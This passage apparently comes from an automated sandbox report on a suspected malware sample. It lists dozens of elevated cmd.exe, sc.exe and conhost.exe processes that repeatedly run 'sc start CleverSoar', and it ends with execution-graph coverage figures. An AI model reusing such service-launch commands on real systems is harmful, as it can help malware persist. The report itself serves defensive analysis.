                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:39
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:40
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:41
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:42
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:43
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:44
                          Start time:22:43:32
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:45
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:46
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:47
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:48
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:49
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:50
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:51
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:52
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:53
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:54
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:55
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:56
                          Start time:22:43:33
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:57
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:58
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:59
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:60
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:61
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:62
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:63
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:64
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:65
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:66
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:67
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:68
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:69
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:70
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:71
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:72
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff70f330000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:73
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:74
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:75
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:76
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:77
                          Start time:22:43:34
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:78
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:79
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:80
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:81
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:82
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:83
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:84
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:85
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:86
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:87
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:88
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:89
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:90
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:91
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:92
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6c7c30000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:93
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:94
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:95
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff72bec0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:96
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:97
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:98
                          Start time:22:43:35
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:99
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:100
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:101
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:103
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:104
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:105
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\sc.exe
                          Wow64 process (32bit):false
                          Commandline:sc start CleverSoar
                          Imagebase:0x7ff6634b0000
                          File size:72'192 bytes
                          MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:106
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff7699e0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true

                          Target ID:107
                          Start time:22:43:36
                          Start date:24/12/2024
                          Path:C:\Windows\System32\cmd.exe
                          Wow64 process (32bit):false
                          Commandline:cmd /c start sc start CleverSoar
                          Imagebase:0x7ff701240000
                          File size:289'792 bytes
                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Has exited:true


                            Execution Graph

                            Execution Coverage:2%
                            Dynamic/Decrypted Code Coverage:0%
                            Signature Coverage:5.1%
                            Total number of Nodes:741
                            Total number of Limit Nodes:9
